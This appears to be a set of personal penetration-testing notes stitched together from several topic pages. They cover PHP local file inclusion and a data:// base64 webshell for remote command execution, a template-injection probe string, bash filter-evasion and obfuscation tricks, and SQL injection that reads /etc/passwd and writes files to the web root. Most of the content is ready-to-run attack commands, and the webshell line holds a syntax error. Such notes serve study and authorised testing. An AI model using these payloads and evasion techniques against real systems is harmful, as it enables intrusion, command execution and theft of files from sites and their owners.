🌱 Seedling notes

Imagine a PHP file where you can perform LFI such as

curl http://example.com/vuln.php?lang=en.php

With a badly configured server and app you can use PHP read filters to get the full content

curl http://example.com/vuln.php?lang=php://filter/read=convert.base64-encode/resource=en.php

You can get a webshell or RCE if allow_url_include is enabled

curl http://example.com?vuln.php?lang=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Cg==%3D%3D&cmd=whoami

The shell is <?php system($_GET['cmd'];

The following string can be used to test a large number of templating engines in one go:

$ { { < % [ % ' " } } % \ .

[!IMPORTANT] Remove the spaces between each character! I’ve included them here because it messes up rendering in some places!

Inserting noop characters

Quotes (even number of non-mixed) will be ignored by bash. $ c'a't becomes $ cat. Similar for $ c"a"t

Backslashing chars (other than \n etc, obs) will have no effect. $ c\at becomes $ cat.

Use the positional param character $ c$@at becomes $ cat

Manipulate the characters

$(rev<<<'tac') becomes cat. Experiment with other things like rot13.

Encode the command

$(base64 -d<<<"Y2F0Cg==") becomes cat

Whitespace

• %0a: newline
• %20: space
• %09: tab
• ${IFS}: Input Field Separators ↗️ (typically space, tab, newline)
• bash bracket expansion: {ls,-la} turns into ls -la

Special characters

• forward slash: echo ${PATH:0:1}
• semicolon: echo ${LS_COLORS:10:1}
• pipe: try using <<<

Shifting characters

This command will shift a letter one to the right echo $(tr '!-}' '"-~'<<<[). e.g. ~ becomes !.

shift_generator() {
  local shift=$1
  local char=$2
  local second_start=$((33 + shift))
  local second_end=$((33 + shift - 1))
  printf "echo \$(tr '\\!-~' '"
  printf '%b-~\\!-%b' "$(printf '\\%03o' $second_start)" "$(printf '\\%03o' $second_end)"
  printf "'<<<'%s')\n" "$char"
}

# usage
shift_generator 1 "~" 

Tooling

For more advanced obfuscation you can consider tools such as:

After enumerating user privileges 🌿 if you find one which has FILE you can use that to read files from the target.

UNION SELECT LOAD_FILE('/etc/passwd')

References

• Enumerating databases, tables, columns, and user privileges with SQL injection 🌿
• Writing files with MySQL 🌱

Tools

• sqlmap ↗️ has a --proxy flag

Pro tip: remember to use proxychains 🌿 to proxy to burp for tools without proxy flags!

Techniques

• Writing files with MySQL 🌱
• Reading files with MySQL 🌱
• How to determine the number of columns for union SQL injection 🌿
• Enumerating database tables and columns with SQL injection 🌿

Prerequisites

This should not be enabled on any modern secure systems, but if it is, you can use it to create a remote shell.

secure_file_priv ↗️ can have the following values:

• null: cannot write anywhere on system
• "" (empty string): can write anywhere
• "/path/to/dir": can write only to specified path

SHOW VARIABLES LIKE 'secure_file_priv';

You can get this by querying the information_schema using a union injection

UNION SELECT VARIABLE_NAME,VARIABLE_VALUE FROM INFORMATION_SCHEMA.GLOBAL_VARIABLES 

Do it

SELECT "OOPS!" INTO OUTFILE "/var/www/html/poc.txt"

References

• Enumerating databases, tables, columns, and user privileges with SQL injection 🌿

Here are some resources containing XSS payloads:

• PayloadsAllTheThings ↗️
• payloadbox ↗️
• findxss ↗️

base64

echo 'test' | base64
echo 'dGVzdAo=' | base64 -d

hex

echo 'test' | xxd -p
echo '746573740a' | xxd -p -r

rot13

echo 'test' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
echo 'grfg' | tr 'A-Za-z' 'N-ZA-Mn-za-m'

• unpacker ↗️ reverses jspacker. Signature eval(function(p,a,c,k,e,r)

References

• Encoding and decoding with base64, hex, etc on command line 🌱